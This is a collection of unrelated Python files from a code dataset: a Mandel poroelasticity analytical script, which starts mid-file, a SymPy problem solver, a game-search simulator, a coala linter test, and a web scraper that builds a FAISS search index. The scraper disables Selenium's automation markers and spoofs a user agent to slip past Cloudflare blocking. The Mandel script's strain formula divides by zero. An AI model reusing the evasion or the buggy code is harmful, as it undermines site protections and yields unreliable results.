0.0\nP_0 = 1.0\n\nM = 1.0 / ( phi / K_fl + (alpha - phi) /K_sg)\nK_u = K_d + alpha*alpha*M\nnu = (3*K_d - 2*G) / (2*(3*K_d + G))\nnu_u = (3*K_u - 2*G) / (2*(3*K_u + G))\nkappa = k / mu_f\na = (xmax - xmin)\nb = (ymax - ymin)\n#c = ( (2*kappa*G) * (1 - nu) * (nu_u - nu) ) / (alpha*alpha * (1 - 2*nu) * (1 - nu) )\nB_alt = (3 * (nu_u - nu) )/(alpha*(1-2*nu)*(1+nu_u))\nB = (alpha*M) / (K_d + alpha*alpha*M) #\nA_1 = 3 / (B * (1 + nu_u))\nA_2 = (alpha * (1 - 2*nu))/(1 - nu)\n\nE = 2.0*G*(1.0 + nu)\n\nE_x = E\nE_z = E\nalpha_1 = alpha\nalpha_3 = alpha\nnu_zx = nu\nnu_yx = nu\nG_xz = G\nkappa_x = kappa\n\nM_11 = ( E_x*(E_z - E_x * nu_zx**2) ) / ( (1 + nu_yx)*(E_z - E_z*nu_yx - 2*E_x * nu_zx**2) )\nM_12 = ( E_x*(nu_yx*E_z + E_x * nu_zx**2) ) / ( (1 + nu_yx)*(E_z - E_z*nu_yx - 2*E_x * nu_zx**2) )\nM_13 = ( E_x*E_z*nu_zx ) / ( E_z - E_z*nu_yx - 2*E_x * nu_zx**2 )\nM_33 = ( E_z**2 * (1 - nu_yx) ) / (E_z - E_z*nu_yx - 2*E_x * nu_zx**2) \nM_55 = G_xz\n\nA_1 = (alpha_1**2 * M_33 - 2*alpha_1*alpha_3*M_13 + alpha_3**2 * M_11)/(alpha_3*M_11 - alpha_1*M_13) + (M_11*M_33 - M_13**2)/(M * (alpha_3*M_11 - alpha_1*M_13) )\nA_2 = (alpha_3*M_11 - alpha_1*M_13) / M_11\n\nc_x = (kappa_x*M*M_11)/(M_11 + alpha_1*alpha_1*M)\nB_prime = (alpha*M)/(K_d + alpha*alpha*M)\n\nK_v = 2.*G*( (1.-nu) / (1.-2.*nu) )\nc_f = kappa*M*( K_v / (K_v + alpha*alpha*M) )\nc = kappa*M*( K_v / (K_v + alpha*alpha*M) )\n# ==============================================================================\ndef mandelZeros():\n \"\"\"\n Compute roots for analytical mandel problem solutions\n \"\"\"\n zeroArray = np.zeros(ITERATIONS)\n\n for i in np.arange(1, ITERATIONS+1,1):\n a1 = (i - 1.0) * np.pi * np.pi / 4.0 + EPS\n a2 = a1 + np.pi / 2\n am = a1\n for j in np.arange(0, ITERATIONS,1):\n y1 = np.tan(a1) - ((1.0 - nu) / (nu_u - nu))*a1\n y2 = np.tan(a2) - ((1.0 - nu) / (nu_u - nu))*a2\n am = (a1 + a2) / 2.0\n ym = np.tan(am) - (1 - nu) / (nu_u - nu)*am\n if ((ym*y1) > 0):\n a1 = am\n else:\n a2 = am\n if (np.abs(y2) < EPS):\n am = a2\n zeroArray[i-1] = am\n return zeroArray\n\ndef displacement(locs,tsteps,zeroArray):\n \"\"\"\n Compute displacement field at locations.\n \"\"\"\n (npts, dim) = locs.shape\n ntpts = tsteps.shape[0]\n displacement = np.zeros((ntpts, npts, dim), dtype=np.float64)\n x = locs[:,0]\n z = locs[:,1]\n t_track = 0\n# zeroArray = mandelZeros()\n\n for t in tsteps:\n# A_x = 0.0\n# B_x = 0.0\n# A_z = 0.0\n\n A_x = np.sum( (np.sin(zeroArray)*np.cos(zeroArray) / (zeroArray - np.sin(zeroArray)*np.cos(zeroArray))) * np.exp( -1.0*(zeroArray*zeroArray*c*t)/(a*a) ) )\n B_x = np.sum((np.cos(zeroArray) / (zeroArray - np.sin(zeroArray)*np.cos(zeroArray))) * np.sin( (zeroArray*x.reshape([x.size,1]))/a) \\\n * np.exp(-1.0*(zeroArray*zeroArray*c*t)/(a*a)),axis=1)\n A_z = np.sum( (np.sin(zeroArray)*np.cos(zeroArray) / (zeroArray - np.sin(zeroArray)*np.cos(zeroArray)))*np.exp( -1.0*(zeroArray*zeroArray*c*t)/(a*a) ) )\n\n\n #for n in np.arange(1,ITERATIONS+1,1):\n# a_n = zeroArray[n-1]\n\n #A_x += (np.sin(a_n)*np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n)))*np.exp(-1.0*(a_n*a_n*c_x*t)/(a*a))\n #B_x += (np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n))) * np.sin( (a_n*x)/a) * np.exp(-1.0*(a_n*a_n*c_x*t)/(a*a))\n \n #A_z += (np.sin(a_n)*np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n)))*np.exp(-1.0*(a_n*a_n*c*t)/(a*a))\n\n# A_x += (np.sin(a_n)*np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n))) * np.exp( -1.0*(a_n*a_n*c_f*t)/(a*a) )\n# B_x += (np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n))) * np.sin( (a_n*x)/a ) * np.exp( -1.0*(a_n*a_n*c_f*t)/(a*a) )\n \n# A_z += (np.sin(a_n)*np.cos(a_n) / (a_n - np.sin(a_n)*np.cos(a_n)))*np.exp( -1.0*(a_n*a_n*c_f*t)/(a*a) )\n \n# print('t = ', t, ' A_x= ', A_x)\n# print('t = ', t, ' B_x= ', B_x)\n# print('t = ', t, ' A_z= ', A_z) \n\n # Isotropic Formulation\n# displacement[t_track,:,0] = ( (F*nu)/(2.*G*a) - (F*nu_u)/(G*a) * A_x )*x + (F/G)*B_x\n# displacement[t_track,:,1] = ( -(F*(1.-nu))/(2.*G*a) + (F*(1-nu_u))/(G*a) * A_z )*z\n\n # Orthotropic Formulation\n displacement[t_track,:,0] = (F/a * M_13/(M_11*M_33 - M_13*M_13) - (2.*F)/a * (alpha_1*alpha_3*M + M_13)/(A_1*M*(alpha_3*M_11 - alpha_1*M_13))*A_x)*x + (2.*F*alpha_1)/(A_2*M_11) * B_x\n displacement[t_track,:,1] = (-F/a)*(M_11/(M_11*M_33 - M_13*M_13)) * (1.0 + 2.0*(A_2/A_1 - 1.0) * A_z)*z\n t_track += 1\n\n return displacement\n\ndef pressure(locs, tsteps, zeroArray):\n \"\"\"\n Compute pressure field at locations.\n \"\"\"\n (npts, dim) = locs.shape\n ntpts = tsteps.shape[0]\n pressure = np.zeros((ntpts, npts), dtype=np.float64)\n x = locs[:,0]\n z = locs[:,1]\n t_track = 0\n# zeroArray = mandelZeros()\n p_0 = (1./(3.*a))*B*(1+nu_u)*F\n for t in tsteps:\n p = np.sum( np.sin(zeroArray)/(zeroArray - np.sin(zeroArray)*np.cos(zeroArray)) * (np.cos( (zeroArray*x.reshape([x.size,1]))/a) \\\n - np.cos(zeroArray))*np.exp(-1.0*(zeroArray*zeroArray*c*t)/(a*a)), axis=1 )\n \n# if t == 0.0:\n# pressure[t_track,:] = (1./(3.*a))*(B*(1.+nu_u))*F\n# else:\n# p = np.sum( (np.sin(zeroArray) / (zeroArray - np.sin(zeroArray)*np.cos(zeroArray))) \\\n# * (np.cos( (zeroArray*x.reshape([x.size,1])) / a) - np.cos(zeroArray)) * np.exp(-1.0*(zeroArray*zeroArray * c_x * t)/(a*a)), axis=1 )\n# p = 0.0\n# for n in np.arange(1, ITERATIONS+1,1):\n# x_n = zeroArray[n-1]\n# p += (np.sin(x_n) / (x_n - np.sin(x_n)*np.cos(x_n))) * (np.cos( (x_n*x) / a) - np.cos(x_n)) * np.exp(-1.0*(x_n*x_n * c_x * t)/(a*a))\n# pressure[t_track,:] = (2.*F)/(a*A_1) * p\n\n # Isotropic Formulation\n# pressure[t_track,:] = 2.0*p_0 * p\n \n # Orthotropic Formulation\n pressure[t_track,:] = (2.*F)/(a*A_1) * p \n t_track += 1\n\n return pressure\n\ndef trace_strain(locs, tsteps, zeroArray):\n \"\"\"\n Compute trace strain field at locations.\n \"\"\"\n (npts, dim) = locs.shape\n ntpts = tsteps.shape[0]\n trace_strain = np.zeros((ntpts, npts), dtype=np.float64)\n x = locs[:,0]\n z = locs[:,1]\n t_track = 0\n# zeroArray = mandelZeros()\n\n for t in tsteps:\n\n eps_A = 0.0\n eps_B = 0.0\n eps_C = 0.0\n\n for i in np.arange(1, ITERATIONS+1,1):\n x_n = zeroArray[i-1]\n eps_A += (x_n * np.exp( (-1.0*x_n*x_n*c*t)/(a*a)) * np.cos(x_n)*np.cos( (x_n*x)/a)) / (a * (x_n - np.sin(x_n)*np.cos(x_n)))\n eps_B += ( np.exp( (-1.0*x_n*x_n*c*t)/(a*a)) * np.sin(x_n)*np.cos(x_n)) / (x_n - np.sin(x_n)*np.cos(x_n))\n eps_C += ( np.exp( (-1.0*x_n*x_n*c*t)/(x_n*x_n)) * np.sin(x_n)*np.cos(x_n)) / (x_n - np.sin(x_n)*np.cos(x_n))\n\n trace_strain[t_track,:] = (F/G)*eps_A + ( (F*nu)/(2.0*G*a)) - eps_B/(G*a) - (F*(1.0-nu))/(2/0*G*a) + eps_C/(G*a)\n t_track += 1\n\n return trace_strain\n\n\n# ==============================================================================\nf = h5py.File('./output/mandel_quad-domain.h5','r')\n\nt = f['time'][:]\nt = t.ravel()\n\nU = f['vertex_fields/displacement'][:]\nP = f['vertex_fields/pressure'][:]\nS = f['vertex_fields/trace_strain'][:]\n\npos = f['geometry/vertices'][:]\n\nzeroArray = mandelZeros()\nU_exact = displacement(pos, t, zeroArray)\nP_exact = np.reshape(pressure(pos, t, zeroArray),[t.shape[0],pos.shape[0],1])\n#S_exact = trace_strain(pos, t)\n\n# Graph time snapshots\nt_steps = t.ravel()\nt_step_array = np.linspace(0,t_steps.size,5).astype(np.int)\nt_step_array[0] += 2\nt_step_array[-1] -= 1\n#t_step_array = np.array([5, 10, 20, 25, 30])\n\nt_N = c*t / (a*a)\nP_N = (a*P) / F\n\nU_N = U.copy()\nU_N[:,:,0] = U[:,:,0] / a\nU_N[:,:,1] = U[:,:,1] / b\n\nP_exact_N = (a*P_exact) / F\n\nU_exact_N = U_exact.copy()\nU_exact_N[:,:,0] = U_exact[:,:,0] / a\nU_exact_N[:,:,1] = U_exact[:,:,1] / b\n\npos_N = pos.copy()\npos_N[:,0] = pos[:,0] / a\npos_N[:,1] = pos[:,1] / b\n\n# Zero Lines\nx_zero_row = np.flatnonzero(pos_N[:,0]==0)\nx_zero_pos = np.zeros([x_zero_row.size,3])\nx_zero_pos[:,:2] = pos[x_zero_row]\nx_zero_pos[:,2] = x_zero_row\nx_zero_pos = x_zero_pos[x_zero_pos[:,1].argsort()][:,2]\nx_zero_pos = x_zero_pos.astype(np.int)\n\nz_zero_row = np.flatnonzero(pos_N[:,1]==0)\nz_zero_pos = np.zeros([z_zero_row.size,3])\nz_zero_pos[:,:2] = pos[z_zero_row]\nz_zero_pos[:,2] = z_zero_row\nz_zero_pos = z_zero_pos[z_zero_pos[:,0].argsort()][:,2]\nz_zero_pos = z_zero_pos.astype(np.int)\n\n# Initial Conditions\nU_initial = U[0,:,:].copy()\n\nU_initial[:,0] = (F*nu_u*pos[:,0])/(2.*G*a)\nU_initial[:,1] = -(F*(1.-nu_u)*pos[:,1])/(2.*G*a)\n\nU_final = U[-1,:,:].copy()\n\nU_final[:,0] = (F*nu*pos[:,0])/(2.*G*a)\nU_final[:,1] = -(F*(1.-nu)*pos[:,1])/(2.*G*a)\n\nP_initial = P[0,:].copy()\nP_initial[:] = 1./(3.*a) * B * (1. + nu_u) * F\n\nP_final = P[-1,:].copy()\nP_final[:] = 1./(3.*a) * B * (1. + nu) * F\n\ncm_numeric = ['red','orange','green','blue','indigo', 'violet']\ncm_analytic = ['red','orange','green','blue','indigo', 'violet']\n\n# ==============================================================================\n# Generate Analytical Solution Plots\n# ==============================================================================\n\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport numpy as np\n\nX = pos.copy()[:,0]\nY = pos.copy()[:,1]\nX_N = pos_N.copy()[:,0]\nY_N = pos_N.copy()[:,1]\n\n\n\ny_pos = np.where(Y == ymax)[0]\nx_pos = np.where(X == xmax)[0]\nx_fig = X[y_pos]\ny_fig = Y[x_pos]\nx_fig, tx_fig = np.meshgrid(x_fig, t)\ny_fig, ty_fig = np.meshgrid(y_fig, t)\n\n# Analytical Pressure\nfig = plt.figure()\nfig.set_size_inches(15,10)\nax = fig.gca(projection='3d')\n\nsurf_pressure = ax.plot_surface(x_fig, tx_fig, P_exact[:,y_pos,0], cmap=cm.coolwarm, rcount=500, ccount=500)\nfig.colorbar(surf_pressure, shrink=0.5, aspect=5)\n\nax.set_xlabel('Distance, m')\nax.set_ylabel('Time, s')\nax.set_zlabel('Pressure, Pa')\nax.set_title(\"Analytical Pressure Along X Axis\")\n\nfor angle in range(0, 360):\n ax.view_init(30, angle)\n plt.draw()\n print_angle = \"{0:0=3d}\".format(angle)\n savename = 'output/mandel_analytical_pressure_x_' + print_angle + '.png'\n fig.savefig(savename,dpi = 300) \n plt.pause(.00001)\n\n#ax.view_init(elev=30., azim=35)\n#plt.show()\n\n# Numerical Pressure\n\nfig = plt.figure()\nfig.set_size_inches(15,10)\nax = fig.gca(projection='3d')\n\nsurf_pressure = ax.plot_surface(x_fig, tx_fig, P[:,y_pos,0], cmap=cm.coolwarm, rcount=500, ccount=500)\nfig.colorbar(surf_pressure, shrink=0.5, aspect=5)\n\nax.set_xlabel('Distance, m')\nax.set_ylabel('Time, s')\nax.set_zlabel('Pressure, Pa')\nax.set_title(\"Numerical Pressure Along X Axis\")\n\n\nfor angle in range(0, 360):\n ax.view_init(30, angle)\n plt.draw()\n print_angle = \"{0:0=3d}\".format(angle)\n savename = 'output/mandel_numerical_pressure_x_' + print_angle + '.png'\n fig.savefig(savename,dpi = 300) \n plt.pause(.00001)\n\n\n\n","repo_name":"rwalkerlewis/pylith_examples","sub_path":"poroelasticity/mandel/mandel_analytical.py","file_name":"mandel_analytical.py","file_ext":"py","file_size_in_byte":11684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"26385718143","text":"import sympy\r\nfrom sympy import symbols, Eq, solve, Integral, Derivative, Matrix, lambdify\r\nfrom sympy.plotting import plot\r\n\r\n# Dictionary to store previously solved problems\r\nprev_problems = {}\r\n\r\n#Define function for solving problems\r\ndef solve_problem(problem_str):\r\n problem_str = problem_str.replace(\" \", \"\")\r\n # Check if the problem has been solved before\r\n if problem_str in prev_problems:\r\n return prev_problems[problem_str]\r\n\r\n # Check if the problem is an equation\r\n if \"=\" in problem_str:\r\n # Parse the equation\r\n left, right = problem_str.split(\"=\")\r\n expr = sympy.parsing.sympy_parser.parse_expr(left) - sympy.parsing.sympy_parser.parse_expr(right)\r\n\r\n # Solve the equation\r\n solutions = solve(expr, symbols('x'))\r\n\r\n # If the left-hand side was not zero, add the right-hand side to the solutions\r\n if left != str(solutions[0]):\r\n solutions = [sol + sympy.parsing.sympy_parser.parse_expr(right) for sol in solutions]\r\n\r\n # Check if the problem is a system of equations\r\n elif 'system' in problem_str:\r\n eqns = problem_str.split(',')\r\n eqns = [sympy.parsing.sympy_parser.parse_expr(eqn) for eqn in eqns]\r\n vars = []\r\n for eqn in eqns:\r\n vars += list(eqn.free_symbols)\r\n vars = sorted(set(vars), key=lambda var: str(var))\r\n solutions = sympy.solve(eqns, vars)\r\n\r\n # Check if the problem is a polynomial equation\r\n elif 'polynomial' in problem_str:\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str.replace('polynomial', ''))\r\n solutions = sympy.roots(expr, multiple=True)\r\n \r\n # Check if the problem is a derivative\r\n elif 'derivative' in problem_str:\r\n expr, x, a = problem_str.split(',')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n a = float(a)\r\n solutions = sympy.diff(expr, symbols(x)).subs(x, a)\r\n\r\n # Check if the problem is an integral\r\n elif 'integral' in problem_str:\r\n expr, x, a, b = problem_str.split(',')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n a = float(a)\r\n b = float(b)\r\n solutions = sympy.integrate(expr, (symbols(x), a, b))\r\n \r\n # Check if the problem is a Fourier series\r\n elif 'fourier series' in problem_str:\r\n expr, x, a, b = problem_str.split(',')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n a = float(a)\r\n b = float(b)\r\n period = b - a\r\n fs = sympy.fourier_series(expr, (symbols(x), a, b))\r\n solutions = fs.truncate(n=5)\r\n\r\n # Check if the problem is a partial differential equation\r\n elif 'heat equation' in problem_str:\r\n x, y, t = symbols('x y t')\r\n u = sympy.Function('u')(x, y, t)\r\n k = symbols('k')\r\n eq = Eq(sympy.diff(u, t) - k*(sympy.diff(u, x, x) + sympy.diff(u, y, y)), 0)\r\n solutions = sympy.pde.pdsolve(eq)\r\n\r\n else:\r\n # Parse the problem into a SymPy expression\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str)\r\n\r\n # Solve the problem by simplifying the expression\r\n solutions = sympy.simplify(expr)\r\n\r\n\r\n # Check for additional functionality\r\n if 'sin' in problem_str or 'cos' in problem_str:\r\n solutions = sympy.solveset(expr, symbols('x'))\r\n elif 'tan' in problem_str:\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str)\r\n solutions = sympy.simplify(expr)\r\n \r\n elif 'limit' in problem_str:\r\n expr, x, a = problem_str.split(',')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n a = float(a)\r\n solutions = sympy.limit(expr, symbols(x), a)\r\n \r\n elif 'second derivative' in problem_str:\r\n expr = problem_str.replace('second derivative of ', '')\r\n expr = sympy.parsing.sympy_parser.parse_expr(expr)\r\n solutions = sympy.diff(expr, symbols('x'), 2)\r\n \r\n elif 'heat equation' in problem_str:\r\n u = sympy.Function('u')(symbols('x'), symbols('y'))\r\n eq = sympy.Eq(sympy.diff(u, symbols('x'), symbols('x')) + sympy.diff(u, symbols('y'), symbols('y')), 0)\r\n solutions = sympy.pde.pdsolve(eq)\r\n \r\n # Check if the problem is a second-order differential equation\r\n elif 'second order differential equation' in problem_str:\r\n # Parse the equation\r\n expr, x = symbols('y'), symbols('x')\r\n y = sympy.Function('y')(x)\r\n eq = sympy.Eq(sympy.diff(y, x, x) + 2*sympy.diff(y, x) + 5*y, 0)\r\n solutions = sympy.dsolve(eq)\r\n \r\n # Check if the problem is a partial differential equation with more than two variables\r\n elif 'wave equation' in problem_str:\r\n x, y, z, t = symbols('x y z t')\r\n u = sympy.Function('u')(x, y, z, t)\r\n eq = Eq(sympy.diff(u, t, t) - sympy.diff(u, x, x) - sympy.diff(u, y, y) - sympy.diff(u, z, z), 0)\r\n solutions = sympy.pde.pdsolve(eq)\r\n \r\n elif 'plot' in problem_str:\r\n # Parse the function and plot\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str.replace('plot ', ''))\r\n p = plot(expr, show=False)\r\n p.show()\r\n return \"Graph displayed.\"\r\n \r\n elif 'numeric' in problem_str:\r\n # Parse the function, convert to a lambda function, and evaluate numerically\r\n expr = sympy.parsing.sympy_parser.parse_expr(problem_str.replace('numeric ', ''))\r\n f = lambdify(x, expr)\r\n a, b = [float(x) for x in input(\"Enter the start and end points: \").split()]\r\n n = int(input(\"Enter the number of steps: \"))\r\n x_vals = [a + i*(b-a)/n for i in range(n+1)]\r\n y_vals = [f(x) for x in x_vals]\r\n p = plot(expr, (x, a, b), show=False)\r\n p.scatter(x_vals, y_vals)\r\n p.show()\r\n return \"Graph displayed.\"\r\n else:\r\n pass\r\n\r\n\r\n # Store the solution in the previous problems dictionary\r\n prev_problems[problem_str] = solutions\r\n\r\n # Return the solution(s) to the user\r\n return solutions\r\n\r\n# Main loop\r\nwhile True:\r\n # Get user input\r\n user_input = input(\"Enter a mathematical problem: \")\r\n\r\n # Check if the problem has already been solved\r\n if user_input in prev_problems:\r\n print(f\"Result (from history): {prev_problems[user_input]}\")\r\n continue\r\n\r\n # Try to solve the problem\r\n try:\r\n solutions = solve_problem(user_input)\r\n print(f\"Result: {solutions}\")\r\n except:\r\n print(\"Error: Could not solve the problem.\")\r\n","repo_name":"NtloyiyaOkuhle/HackMathsWeb","sub_path":"HackMaths/HackMaths.py","file_name":"HackMaths.py","file_ext":"py","file_size_in_byte":6522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"6342727200","text":"from GameFlow import Board, BoardTerminalTest, FenceChecker, MoveChecker\nfrom Search import DLAlphaBetaSearch, MinimaxSearch, AlphaBetaSearch, DLMinimaxSearch\nfrom Core import Player\nfrom Heuristics import ShortestPathHeuristic\nfrom copy import deepcopy\nfrom UIKit import UIBoard\n\nclass Versus:\n \"\"\"Simulator for two bots playing against each other\"\"\"\n def __init__(self, max_depth_level: int, min_depth_level: int, grid_size: int):\n self.max_depth_level = max_depth_level\n self.min_depth_level = min_depth_level\n self.grid_size = grid_size\n \n fence_checker = FenceChecker(fence_length=2, should_check_for_obscured_path = True)\n move_checker = MoveChecker()\n self.board = Board(fence_checker, move_checker, self.grid_size)\n self.terminal_test = BoardTerminalTest()\n self.visit_count = {}\n\n def start(self) -> None:\n \"\"\"Begin the simulation\"\"\"\n tmp_board = deepcopy(self.board)\n\n heuristic = ShortestPathHeuristic()\n \n while not self.terminal_test.is_terminal(tmp_board):\n\n UIBoard.print_board(tmp_board)\n\n if tmp_board.current_player == Player.MAX:\n \n max_search: DLAlphaBetaSearch = DLAlphaBetaSearch(\n depth = self.max_depth_level,\n heuristic = heuristic, \n visit_count = self.visit_count\n )\n max_strategy = max_search.find_strategy(tmp_board, self.terminal_test)\n \n max_best_action = max_strategy.get(tmp_board)\n tmp_board = tmp_board.get_action_result(max_best_action)\n \n continue\n else:\n \n min_search: DLAlphaBetaSearch = DLAlphaBetaSearch(\n depth = self.min_depth_level,\n heuristic = heuristic,\n visit_count = self.visit_count\n )\n min_strategy = min_search.find_strategy(tmp_board, self.terminal_test) \n \n min_best_action = min_strategy.get(tmp_board)\n tmp_board = tmp_board.get_action_result(min_best_action)\n continue\n \n\n print(self.terminal_test.utility(tmp_board))\n","repo_name":"PetrosTepoyan/AI-Group-Project","sub_path":"GameFlow/Versus.py","file_name":"Versus.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"23"} +{"seq_id":"12768983960","text":"import logging\nfrom queue import Queue\n\nfrom bears.general.LineContinuationBear import LineContinuationBear\nfrom coalib.testing.LocalBearTestHelper import LocalBearTestHelper\nfrom coalib.testing.LocalBearTestHelper import execute_bear\nfrom coalib.results.Result import Result\nfrom coalib.settings.Section import Section\nfrom coalib.settings.Setting import Setting\n\n\ngood_file = \"\"\"\na = some_function(\n '1' + '2')\n\ndef fun():\n '''\n >>> from math \\\\\n ... import pow\n '''\n\"\"\"\n\n\nclass LineContinuationBearTest(LocalBearTestHelper):\n\n def setUp(self):\n self.section = Section('name')\n self.uut = LineContinuationBear(self.section, Queue())\n\n def test_good_file(self):\n self.section.append(Setting('language', 'Python'))\n self.check_validity(self.uut, good_file.splitlines())\n\n def test_bad_file(self):\n self.section.append(Setting('language', 'Python'))\n self.check_results(\n self.uut, ['a = 1 + \\\\', '2'],\n [Result.from_values('LineContinuationBear',\n 'Explicit line continuation is not allowed.',\n line=1, column=9, end_line=1, end_column=10,\n file='default')],\n filename='default')\n\n def test_lang_exception(self):\n self.section.append(Setting('language', 'BlaBlaBla'))\n ERROR_MESSAGE = 'ERROR:root:Language BlaBlaBla is not yet supported.'\n logger = logging.getLogger()\n\n with self.assertLogs(logger, 'ERROR') as log:\n with execute_bear(self.uut, filename='F', file='') as result:\n self.assertEqual(len(log.output), 1)\n self.assertEqual(log.output[0], ERROR_MESSAGE)\n","repo_name":"coala/coala-bears","sub_path":"tests/general/LineContinuationBearTest.py","file_name":"LineContinuationBearTest.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":292,"dataset":"github-code","pt":"23"} +{"seq_id":"72332389498","text":"import os\nimport re\nimport numpy as np\nimport pandas as pd\nfrom time import sleep\nfrom numpy import random\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.ui import WebDriverWait \nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom concurrent.futures import ThreadPoolExecutor\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.vectorstores.faiss import FAISS\nfrom langchain.docstore.document import Document\n\n\n# OPENAI api key\nos.environ['OPENAI_API_KEY'] = 'XXXXXXXXXXXXXXXX'\n# base url that will be recursively checked\nSTART_URL = 'https://support.optimizely.com/'\n# filter for specific URLs - use START_URL is no additional URL is needed\nFILTER_URLS = 'https://support.optimizely.com/hc/en-us/'\n# HTML class that contains the text in the URLs \nCLASS_HTML = 'lg:pl-5'\n# output from linkchecker\nOUTPUT_URLS = 'log_urls.csv'\n# FAISS vector database name\nOUTPUT_INDEX = 'faiss_search_index'\n# final text and URL pairs - optional\nOUTPUT_SOUP = 'final_soup.csv'\n# only 1 thread is used here as Cloudflare was blocking more\nWORKERS = 1\n\n\ndef scrape_docs(start_url, output_urls):\n '''\n Use linkchecker to recursiverly get all URL associated with the start_url\n Depth (parameter r) is here set to 2 levels\n '''\n\n try:\n os.system(f'linkchecker --r=2 --timeout=10 --threads=100 --no-warnings --output csv {start_url} > {output_urls}')\n except:\n print('Cannot scrape docs')\n\n\ndef load_output(output_urls, filter_urls):\n '''\n Load urls from linkchecker to be cleaned\n '''\n\n # ignore last summary row and first 3 lines of header\n df = pd.read_csv(output_urls, sep=';', skipfooter=1, skiprows=3, engine='python')\n # remove unnecessary urls\n df = df.tail(-2)\n # drop any duplicates\n df = df.drop_duplicates(subset=['urlname'])\n urls = df['urlname']\n # return only specific urlnames\n urls = urls[urls.str.contains(filter_urls)]\n\n return urls\n\n\ndef get_driver():\n ''''\n Create Chrome Driver with options for automation\n '''\n\n chrome_options = Options()\n chrome_options.add_argument(\"--window-size=1920,1080\")\n chrome_options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n chrome_options.add_experimental_option('useAutomationExtension', False)\n chrome_options.add_argument(\"--enable-javascript\")\n chrome_options.add_argument(\"--start-maximized\")\n chrome_options.add_argument(\"--nogpu\")\n chrome_options.add_argument(\"--headless=false\")\n chrome_options.add_argument('--disable-blink-features=AutomationControlled')\n chrome_options.add_argument('--user-agent=\"Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; Microsoft; Lumia 640 XL LTE) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.10166')\n\n driver = webdriver.Chrome(options=chrome_options)\n\n return driver\n\n\ndef split_urls(file, workers):\n '''\n Split url list to be split for workers\n '''\n\n N = workers\n filenames = []\n for i, file in enumerate(np.array_split(file, N)):\n filename = f\"urls_{i + 1}.csv\"\n filenames.append(filename)\n file.to_csv(filename, index=False)\n\n return filenames\n\n\ndef get_handles(filename, driver):\n '''\n Get text elements, extract class_html from there, and clean spaces\n '''\n\n df = pd.read_csv(filename)\n\n soups = []\n for _, row in df.iterrows():\n try:\n url = row['urlname']\n driver.get(url)\n element_present = EC.presence_of_element_located((By.ID, 'page-container'))\n # wait 5 seconds at most to get element present\n WebDriverWait(driver, 5).until(element_present)\n # small random sleep to avoid large bursts of access\n sleep(random.uniform(1, 3))\n soup = BeautifulSoup(driver.page_source,\"lxml\")\n body_soup = soup.find(\"div\", {\"class\": CLASS_HTML})\n clean_soup = re.sub(\"\\s\\s+\", \" \", body_soup.get_text())\n soups.append([clean_soup, url])\n except Exception:\n continue\n\n df_soup = pd.DataFrame(soups, columns=[\"page_content\", \"source\"])\n df_soup.to_csv(filename.replace('urls', 'soups'), index = False)\n\n\ndef save_workers(filenames, output_soup_file):\n '''\n Save text elements from each worker\n '''\n\n dfs = [pd.read_csv(f.replace('urls', 'soups')) for f in filenames]\n # Combine the list of dataframes\n df = pd.concat(dfs, ignore_index=True)\n # save df to csv\n df.to_csv(f'{output_soup_file}', index = False)\n\n return df\n\n\ndef setup_workers(list_urls):\n '''\n Setup pool of threads\n '''\n\n files = split_urls(list_urls, WORKERS)\n drivers = [get_driver() for _ in range(WORKERS)]\n\n with ThreadPoolExecutor(max_workers=WORKERS) as executor:\n executor.map(get_handles, files, drivers)\n\n [driver.quit() for driver in drivers]\n\n df = save_workers(files, OUTPUT_SOUP)\n\n return df\ndef save_search_index(df, output_index):\n '''\n Create embeddings and save search index\n '''\n\n source_chunks = []\n # chunks of a maximum size of 1000 characters; no overlap\n splitter = CharacterTextSplitter(separator=\" \", chunk_size=1000, chunk_overlap=0)\n\n sources = [Document(page_content=x, metadata={\"source\": y}) for x, y in zip(df['page_content'], df['source'])]\n for source in sources:\n for chunk in splitter.split_text(source.page_content):\n source_chunks.append(Document(page_content=chunk, metadata=source.metadata))\n\n search_index = FAISS.from_documents(source_chunks, OpenAIEmbeddings())\n\n search_index.save_local(output_index)\n\n\nif __name__ == \"__main__\":\n\n if not os.path.exists(OUTPUT_URLS):\n # run the scrape to get all links; skip if it exists\n scrape_docs(START_URL, OUTPUT_URLS)\n\n # clean output from linkcheck, get only url names\n urls = load_output(OUTPUT_URLS, FILTER_URLS)\n\n # get CLASS_HTML element from all links\n final_df = setup_workers(urls)\n\n # save search index\n save_search_index(final_df, OUTPUT_INDEX)\n","repo_name":"cmigpereira/technical-docs-bot","sub_path":"build_db.py","file_name":"build_db.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"23"} +{"seq_id":"620021291","text":"# -*- coding: 